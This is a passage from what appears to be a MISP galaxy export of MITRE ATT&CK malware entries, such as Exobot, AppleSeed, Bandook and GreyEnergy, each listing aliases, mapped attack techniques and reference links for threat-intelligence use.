uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Call Control - T1616" with estimative-language:likelihood-probability="almost-certain"

Table 4928. Table References
Links
https://attack.mitre.org/software/S0422
https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/

Exobot - S0522

[Exobot](https://attack.mitre.org/software/S0522) is Android banking malware, primarily targeting financial institutions in Germany, Austria, and France.(Citation: Threat Fabric Exobot)

The tag is: misp-galaxy:mitre-malware="Exobot - S0522"

Exobot - S0522 is also known as:

Exobot
Marcher

View relationships graph

Exobot - S0522 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy Through Victim - T1604" with estimative-language:likelihood-probability="almost-certain"

Table 4929. Table References
Links
https://attack.mitre.org/software/S0522
https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html

AppleSeed - S0622

[AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021)

The tag is: misp-galaxy:mitre-malware="AppleSeed - S0622"

AppleSeed - S0622 is also known as:

AppleSeed

View relationships graph

AppleSeed - S0622 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 4930. Table References
Links
https://attack.mitre.org/software/S0622
https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

NDiskMonitor - S0272

[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)

The tag is: misp-galaxy:mitre-malware="NDiskMonitor - S0272"

NDiskMonitor - S0272 is also known as:

NDiskMonitor

View relationships graph

NDiskMonitor - S0272 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

Table 4931. Table References
Links
https://attack.mitre.org/software/S0272
https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

NanHaiShu - S0228

[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)

The tag is: misp-galaxy:mitre-malware="NanHaiShu - S0228"

NanHaiShu - S0228 is also known as:

NanHaiShu

View relationships graph

NanHaiShu - S0228 has relationships with:

similar: misp-galaxy:tool="NanHaiShu" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 4932. Table References
Links
https://attack.mitre.org/software/S0228
https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

MacSpy - S0282

[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="MacSpy - S0282"

MacSpy - S0282 is also known as:

MacSpy

View relationships graph

MacSpy - S0282 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

Table 4933. Table References
Links
https://attack.mitre.org/software/S0282
https://objective-see.com/blog/blog_0x25.html

AndroRAT - S0292

[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)

The tag is: misp-galaxy:mitre-malware="AndroRAT - S0292"

AndroRAT - S0292 is also known as:

AndroRAT

View relationships graph

AndroRAT - S0292 has relationships with:

similar: misp-galaxy:malpedia="AndroRAT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

Table 4934. Table References
Links
https://attack.mitre.org/software/S0292
https://blog.lookout.com/blog/2016/05/25/spoofed-apps/

Orz - S0229

[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="Orz - S0229"

Orz - S0229 is also known as:

Orz
AIRBREAK

View relationships graph

Orz - S0229 has relationships with:

similar: misp-galaxy:malpedia="AIRBREAK" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

Table 4935. Table References
Links
https://attack.mitre.org/software/S0229
https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

Charger - S0323

[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals steals contacts and SMS messages from the user’s device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)

The tag is: misp-galaxy:mitre-malware="Charger - S0323"

Charger - S0323 is also known as:

Charger

View relationships graph

Charger - S0323 has relationships with:

similar: misp-galaxy:malpedia="Charger" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"

Table 4936. Table References
Links
https://attack.mitre.org/software/S0323
http://blog.checkpoint.com/2017/01/24/charger-malware/

MURKYTOP - S0233

[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="MURKYTOP - S0233"

MURKYTOP - S0233 is also known as:

MURKYTOP

View relationships graph

MURKYTOP - S0233 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

Table 4937. Table References
Links
https://attack.mitre.org/software/S0233
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

Bread - S0432

[Bread](https://attack.mitre.org/software/S0432) was a large-scale billing fraud malware family known for employing many different cloaking and obfuscation techniques in an attempt to continuously evade Google Play Store’s malware detection. 1,700 unique Bread apps were detected and removed from the Google Play Store before being downloaded by users.(Citation: Google Bread)

The tag is: misp-galaxy:mitre-malware="Bread - S0432"

Bread - S0432 is also known as:

Bread
Joker

View relationships graph

Bread - S0432 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517" with estimative-language:likelihood-probability="almost-certain"

Table 4938. Table References
Links
https://attack.mitre.org/software/S0432
https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html

Bandook - S0234

[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as "Operation Manul".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)

The tag is: misp-galaxy:mitre-malware="Bandook - S0234"

Bandook - S0234 is also known as:

Bandook

View relationships graph

Bandook - S0234 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 4939. Table References
Links
https://attack.mitre.org/software/S0234
https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf
https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf
https://research.checkpoint.com/2020/bandook-signed-delivered/

DealersChoice - S0243

[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)

The tag is: misp-galaxy:mitre-malware="DealersChoice - S0243"

DealersChoice - S0243 is also known as:

DealersChoice

View relationships graph

DealersChoice - S0243 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 4940. Table References
Links
https://attack.mitre.org/software/S0243
https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/

SpyDealer - S0324

[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)

The tag is: misp-galaxy:mitre-malware="SpyDealer - S0324"

SpyDealer - S0324 is also known as:

SpyDealer

View relationships graph

SpyDealer - S0324 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

Table 4941. Table References
Links
https://attack.mitre.org/software/S0324
https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/

GreyEnergy - S0342

[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it.(Citation: ESET GreyEnergy Oct 2018)

The tag is: misp-galaxy:mitre-malware="GreyEnergy - S0342"

GreyEnergy - S0342 is also known as:

GreyEnergy

View relationships graph

GreyEnergy - S0342 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 4942. Table References
Links
https://attack.mitre.org/software/S0342
